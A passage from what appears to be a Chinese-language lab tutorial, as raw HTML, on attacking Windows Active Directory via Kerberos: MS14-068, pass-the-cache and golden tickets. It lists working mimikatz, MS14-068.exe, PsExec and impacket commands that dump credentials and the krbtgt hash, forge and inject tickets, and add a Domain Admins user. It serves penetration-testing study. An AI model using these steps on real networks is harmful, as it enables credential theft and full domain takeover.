class="header-anchor"&gt;&lt;/a&gt;六、Kerberos认证协议&#10;&lt;/h3&gt;&lt;p&gt;Kerberos是⼀种第三⽅认证协议，通过使⽤对称加密技术为客户端/服务器应⽤程序提供强身份验证。在希腊神话中Kerberos是守护地狱之⻔的⼀条三头神⽝，⽽这三个头分别代表着协议的三个⻆⾊，如下图所示它们分别是:&lt;/p&gt;&#10;&lt;p&gt;1、访问服务的Client（发送请求的一方）&lt;/p&gt;&#10;&lt;p&gt;2、提供服务的Server（接收请求的一方）&lt;/p&gt;&#10;&lt;p&gt;3、KDC，密钥分发中⼼，该中⼼⾥⼜包含以下两个服务：&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;AS，身份验证服务(认证服务器)【专门用来认证客户端的身份并发放客户用于访问TGS的TGT】&lt;/li&gt;&#10;&lt;li&gt;TGS，票据授权服务(票据授予服务器)【用来发放整个认证过程以及客户端访问服务端时所需的服务授予票据】&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0018.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;DC（Domain Controller）：域控制器&lt;/li&gt;&#10;&lt;li&gt;KDC（Key Distribution Center）：密钥分发服中⼼&lt;/li&gt;&#10;&lt;li&gt;AS（Authentication Server）：认证服务器&lt;/li&gt;&#10;&lt;li&gt;TGS（Ticket Granting Server）：票据授权服务器&lt;/li&gt;&#10;&lt;li&gt;TGT（Ticket Granting Ticket）：票据授权票据&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;&lt;strong&gt;认证概述&lt;/strong&gt;&lt;/p&gt;&#10;&lt;p&gt;1、⾸先客户端向 AS 发起请求，获得TGT。&lt;/p&gt;&#10;&lt;p&gt;2、客户端使⽤从 AS 获得的TGT，向 TGS 发起请求，TGS 成功解密 TGT 后，生成新的票据返回给客户端。&lt;/p&gt;&#10;&lt;p&gt;4、客户端使⽤ TGS 返回的新票据向服务器发送请求进⾏授权。&lt;/p&gt;&#10;&lt;h3 id="七实验ptcpass-the-ccahe缓存传递"&gt;&lt;a href="#%e4%b8%83%e5%ae%9e%e9%aa%8cptcpass-the-ccahe%e7%bc%93%e5%ad%98%e4%bc%a0%e9%80%92" class="header-anchor"&gt;&lt;/a&gt;七、实验：PTC（pass-the-ccahe）缓存传递&#10;&lt;/h3&gt;&lt;p&gt;如果能够拿到⽤户的 TGT，并将其倒⼊到内存，那么就可以冒充该⽤户获得其访问权限。&lt;/p&gt;&#10;&lt;h4 id="ms14-068漏洞"&gt;&lt;a href="#ms14-068%e6%bc%8f%e6%b4%9e" class="header-anchor"&gt;&lt;/a&gt;①MS14-068漏洞&#10;&lt;/h4&gt;&lt;p&gt;MS14-068 是密钥分发中⼼（KDC）服务中的 Windows 漏洞。它允许经过身份验证的⽤户在其 Kerberos 票据（TGT）中插⼊任意 PAC（表示所有⽤户权限的结果）。该漏洞位于kdcsvc.dll 域控制器的密钥分发中⼼中。⽤户可以通过呈现具有改变 PAC 的 kerberos TGT 来获得票据。&lt;/p&gt;&#10;&lt;p&gt;需要⾼权限。&lt;/p&gt;&#10;&lt;p&gt;&lt;strong&gt;影响范围&lt;/strong&gt;&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;Windows Server 2003、Windows Server 2008、Windows Server 2008 R2、Windows Server 2012 及 Windows Server 2012 R2&lt;/li&gt;&#10;&lt;li&gt;Windows Vista、Windows 7、 Windows 8 及 Windows 8.1&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;&lt;strong&gt;补丁编号与利⽤条件&lt;/strong&gt;&lt;/p&gt;&#10;&lt;p&gt;补丁编号：KB3011780&lt;/p&gt;&#10;&lt;p&gt;利⽤条件：&lt;/p&gt;&#10;&lt;ol&gt;&#10;&lt;li&gt;获取到⼀台主机的权限（域内主机）&lt;/li&gt;&#10;&lt;li&gt;收集到计算机域任意用户⽤户的账号密码、SID、域名信息&lt;/li&gt;&#10;&lt;li&gt;没打 MS14-068 补丁&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;p&gt;#这个教程有问题 如果有管理员的账号和密码 大概率可以走PTH 而MS14-068的特点是普通域账户可以提权到域管理员 所以这个漏洞危害才会那么大 而这里任意一个普通域用户就行&lt;/p&gt;&#10;&lt;h4 id="信息收集-1"&gt;&lt;a href="#%e4%bf%a1%e6%81%af%e6%94%b6%e9%9b%86-1" class="header-anchor"&gt;&lt;/a&gt;②信息收集&#10;&lt;/h4&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 2&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 3&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 4&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 5&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 6&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 7&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 8&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 9&#10;&lt;/span&gt;&lt;span class="lnt"&gt;10&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;1、域管理员⽤户的SID&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;whoami /all =&amp;gt; S-1-5-21-863777703-696496247-1862912240-500&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;2、域管理员⽤户的明文密码&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::minidump ./passwd.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sekurlsa::logonpasswords full =&amp;gt; Admin@123&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;3、域名信息（完整域名消息）&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ipconfig /all&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0019.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0020.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;Windows对大小写不敏感，所以mao.com和MAO.COM均可&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0021.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0022.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h4 id="漏洞利用"&gt;&lt;a href="#%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8" class="header-anchor"&gt;&lt;/a&gt;③漏洞利用&#10;&lt;/h4&gt;&lt;h5 id="1生成域控管理员密钥"&gt;&lt;a href="#1%e7%94%9f%e6%88%90%e5%9f%9f%e6%8e%a7%e7%ae%a1%e7%90%86%e5%91%98%e5%af%86%e9%92%a5" class="header-anchor"&gt;&lt;/a&gt;1、生成域控管理员密钥&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;使⽤现成的脚本来获取票据：&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ms14-068.exe -u &amp;lt;⽤户名@域名&amp;gt; -s &amp;lt;SID&amp;gt; -d &amp;lt;ip地址&amp;gt; -p &amp;lt;⽤户密码&amp;gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;MS14-068.exe -u Administrator@MAO.COM -s S-1-5-21-863777703-696496247-1862912240-500 -d 192.168.126.10 -p Admin@123&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0023.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="2将内存中导入生成好的票据"&gt;&lt;a href="#2%e5%b0%86%e5%86%85%e5%ad%98%e4%b8%ad%e5%af%bc%e5%85%a5%e7%94%9f%e6%88%90%e5%a5%bd%e7%9a%84%e7%a5%a8%e6%8d%ae" class="header-anchor"&gt;&lt;/a&gt;2、将内存中导入生成好的票据&#10;&lt;/h5&gt;&lt;p&gt;然后使⽤mimikatz的 &lt;code&gt;kerberos::ptc&lt;/code&gt; 模块来载⼊票据。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;privilege::debug&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;kerberos::ptc TGT_Administrator@MAO.COM.ccache&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0024.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="3开启当前权限的管理员终端"&gt;&lt;a href="#3%e5%bc%80%e5%90%af%e5%bd%93%e5%89%8d%e6%9d%83%e9%99%90%e7%9a%84%e7%ae%a1%e7%90%86%e5%91%98%e7%bb%88%e7%ab%af" class="header-anchor"&gt;&lt;/a&gt;3、开启当前权限的管理员终端&#10;&lt;/h5&gt;&lt;p&gt;使⽤mimikatz的 &lt;code&gt;misc::cmd&lt;/code&gt; 模块，打开打开⼀个新窗⼝验证我们当前权限。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;misc::cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;dir \\192.168.126.10\c$&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0025.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="4psexecexe获取一个交互式shell"&gt;&lt;a href="#4psexecexe%e8%8e%b7%e5%8f%96%e4%b8%80%e4%b8%aa%e4%ba%a4%e4%ba%92%e5%bc%8fshell" class="header-anchor"&gt;&lt;/a&gt;4、PsExec.exe获取一个交互式shell&#10;&lt;/h5&gt;&lt;p&gt;用刚刚生成的管理员终端使用PsExec.exe工具获取一个交互式shell，并创建了隶属于管理员组的用户&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 2&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 3&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 4&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 5&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 6&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 7&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 8&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 9&#10;&lt;/span&gt;&lt;span class="lnt"&gt;10&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;明文密码也可以用psexec.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PsExec64.exe \\192.168.0.110 -u Administrator -p Admin@123!@# -s cmd.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;如果已经导入票据了 直接拿shell就行了 这一步也就是PTC&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;PsExec.exe \\192.168.126.10 cmd&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ipconfig&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;whoami&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;net user carmi carmi@123 /add /domain&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;net group &amp;#34;Domain Admins&amp;#34; carmi /add /domain&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;net group &amp;#34;Domain Admins&amp;#34; /domain&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0026.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0027.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h3 id="ptc-linux"&gt;&lt;a href="#ptc-linux" class="header-anchor"&gt;&lt;/a&gt;PTC linux&#10;&lt;/h3&gt;&lt;ol&gt;&#10;&lt;li&gt;查找票据缓存文件：&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;# 默认位置&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ls /tmp/krb5cc_*&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ls ~/.krb5cc_*&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ol start="2"&gt;&#10;&lt;li&gt;导入票据：&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;span class="lnt"&gt;5&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;# 设置环境变量 工具自带的会读取KRB5CCNAME的参数 而后面是缓存的所在&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;export KRB5CCNAME=/tmp/krb5cc_1000&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;# 查看票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;klist&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ol start="3"&gt;&#10;&lt;li&gt;使用票据：&lt;/li&gt;&#10;&lt;/ol&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;# impacket工具&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;psexec.py -k -no-pass test.domain/administrator@dc.test.domain&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;smbexec.py -k -no-pass test.domain/administrator@dc.test.domain&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;主要使用场景：&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;Linux加入域环境&lt;/li&gt;&#10;&lt;li&gt;域内渗透测试&lt;/li&gt;&#10;&lt;li&gt;跨平台攻击&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h3 id="八实验pttpass-the-ticket黄金票据"&gt;&lt;a href="#%e5%85%ab%e5%ae%9e%e9%aa%8cpttpass-the-ticket%e9%bb%84%e9%87%91%e7%a5%a8%e6%8d%ae" class="header-anchor"&gt;&lt;/a&gt;八、实验：PTT（pass-the-ticket）黄金票据&#10;&lt;/h3&gt;&lt;h4 id="简介-1"&gt;&lt;a href="#%e7%ae%80%e4%bb%8b-1" class="header-anchor"&gt;&lt;/a&gt;①简介&#10;&lt;/h4&gt;&lt;p&gt;KDC 的作⽤是⽣成任意⽤户的 TGT，那么问题来了，是什么条件能够让他⽣成任意⽤户的 TGT 呢？还得看 kerberos 认证的过程，在 windows 认证过程中，客户端将⾃⼰的信息发送给 KDC，然后 KDC 使⽤ &lt;code&gt;krbtgt ⽤户密码的 NTLM hash&lt;/code&gt; 作为密钥进⾏加密，⽣成 TGT。&lt;/p&gt;&#10;&lt;p&gt;&lt;strong&gt;一句话：TGT是KDC使用 krbtgt 用户密码的 hash 作为密钥，加上客户端自己的信息生成的。&lt;/strong&gt;&lt;/p&gt;&#10;&lt;p&gt;那么如果获取到了 krbtgt 的密码 hash 值，是否就可以伪造任意 TGT？答案是肯定的。但因为 krbtgt 只有域控制器上才有，所以使⽤⻩⾦票据(票据传递攻击)意味着之前就拿到了域控制器的权限，所以⻩⾦票据可以理解为⼀个后⻔。&lt;/p&gt;&#10;&lt;p&gt;Krbtgt ⽤户在域控创建完成后⾃动⽣成。&lt;/p&gt;&#10;&lt;p&gt;只要krbtgt用户不更改密码，就可以使用黄金票据是实现任何用户的票据信息，注入到内存中。&lt;/p&gt;&#10;&lt;p&gt;黄金票据在使用的过程需要同域控通信。&lt;/p&gt;&#10;&lt;h4 id="基本条件-1"&gt;&lt;a href="#%e5%9f%ba%e6%9c%ac%e6%9d%a1%e4%bb%b6-1" class="header-anchor"&gt;&lt;/a&gt;②基本条件&#10;&lt;/h4&gt;&lt;ul&gt;&#10;&lt;li&gt;域名称、域 SID(去掉rid)：通过 &lt;code&gt;whoami /user&lt;/code&gt; 获取&lt;/li&gt;&#10;&lt;li&gt;要伪造(目标)的⽤户名：通过 &lt;code&gt;net user /domain&lt;/code&gt; 等⽅法获取&lt;/li&gt;&#10;&lt;li&gt;krbtgt⽤户的hash：通过 mimikatz 等⽅法获取&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h4 id="信息收集-2"&gt;&lt;a href="#%e4%bf%a1%e6%81%af%e6%94%b6%e9%9b%86-2" class="header-anchor"&gt;&lt;/a&gt;③信息收集&#10;&lt;/h4&gt;&lt;p&gt;mimkatz获取 krbtgt hash（只有这一步才需要在域控上操作） =&amp;gt; e798fdc7ba810c372ef7bffcdc8f2d13&lt;/p&gt;&#10;&lt;p&gt;由于mimkatz使用条件有点苛刻，且mimkatz软件问题，在命令行直接复制mimkatz内容可能无法成功或者直接到导致程序崩溃，那么这里可以通过生成log来解决。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;log&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;privilege::debug&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;lsadump::dcsync /user:krbtgt&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0028.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;域SID(不需要权限的域SID)： &lt;code&gt;whoami /user&lt;/code&gt; =&amp;gt; S-1-5-21-863777703-696496247-1862912240（最后的一个横线后表示用户权限。因此只需要前半部分）&lt;/p&gt;&#10;&lt;p&gt;伪造(目标)的⽤户名：&lt;code&gt;net user /domain&lt;/code&gt; =&amp;gt; Administrator&lt;/p&gt;&#10;&lt;p&gt;域名称（完整域名）：&lt;code&gt;ipconfig /all&lt;/code&gt; =&amp;gt; mao.com&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0029.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h4 id="漏洞利用-1"&gt;&lt;a href="#%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8-1" class="header-anchor"&gt;&lt;/a&gt;③漏洞利用&#10;&lt;/h4&gt;&lt;p&gt;管理员窗口操作&lt;/p&gt;&#10;&lt;h5 id="1清除原有票据"&gt;&lt;a href="#1%e6%b8%85%e9%99%a4%e5%8e%9f%e6%9c%89%e7%a5%a8%e6%8d%ae" class="header-anchor"&gt;&lt;/a&gt;1、清除原有票据&#10;&lt;/h5&gt;&lt;p&gt;因为在⽣成票据时需要将原有的票据清空，所以⼀旦票据⽣成失败，主机也将⽆法继续访问域内信息了(脱域)。&lt;/p&gt;&#10;&lt;p&gt;使⽤ &lt;code&gt;kerberos::purge&lt;/code&gt; 清空票据后，就可以使⽤ kerberos::golden ⽣成票据了。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz.exe&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;privilege::debug&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;kerberos::purge 清空票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0030.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="2成票据"&gt;&lt;a href="#2%e6%88%90%e7%a5%a8%e6%8d%ae" class="header-anchor"&gt;&lt;/a&gt;2、⽣成票据&#10;&lt;/h5&gt;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span 